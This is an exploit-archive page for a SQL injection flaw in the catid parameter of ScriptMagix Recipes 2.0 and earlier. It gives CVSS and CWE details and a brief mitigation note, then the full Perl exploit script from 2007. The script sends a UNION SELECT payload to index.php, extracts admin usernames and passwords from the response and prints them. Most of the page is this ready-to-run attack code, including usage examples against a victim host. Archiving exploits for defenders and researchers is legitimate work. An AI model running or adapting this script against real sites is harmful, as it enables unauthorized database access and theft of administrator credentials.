header-logo
Suggest Exploit
vendor:
Recipes
by:
ajann
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Recipes
Affected Version From: <= 2.0
Affected Version To: <= 2.0
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested:
Not mentioned

ScriptMagix Recipes <= 2.0 (index.php catid) Remote Blind SQL Injection Exploit

This exploit allows an attacker to execute SQL queries and retrieve sensitive information from the target system. The vulnerability exists in the index.php file of ScriptMagix Recipes version 2.0 or earlier, specifically in the catid parameter. By manipulating this parameter, an attacker can inject malicious SQL code and retrieve the usernames and passwords of the admin accounts.

Mitigation:

Update to a patched version of ScriptMagix Recipes that addresses the SQL injection vulnerability. Sanitize user input to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#[Script Name: ScriptMagix Recipes <= 2.0 (index.php catid) Remote Blind SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
#[S.Page     : http://www.scriptmagix.com
#[$$         : 35$
#[..         : ajann,Turkey

use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[//   ScriptMagix Recipes <= 2.0 (index.php catid) Remote Blind SQL Injection Exploit
[//                   Usage: exploit.pl [target]
[//                   Example: exploit.pl victim.com
[//                   Example: exploit.pl victim.com
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?catid=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
 }


$target = "-1%20union%20select%200,1,2,3,4,5,6,7,1,2,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),4,0%20from%20admin/*";
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /password:(.*?)<\/a>/){
print "+ Password: $1\n";
}

if ($answer =~ /Syntax error/) { 
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print "+**********************************************************************+\n";
exit(); 
}
 }

# milw0rm.com [2007-03-18]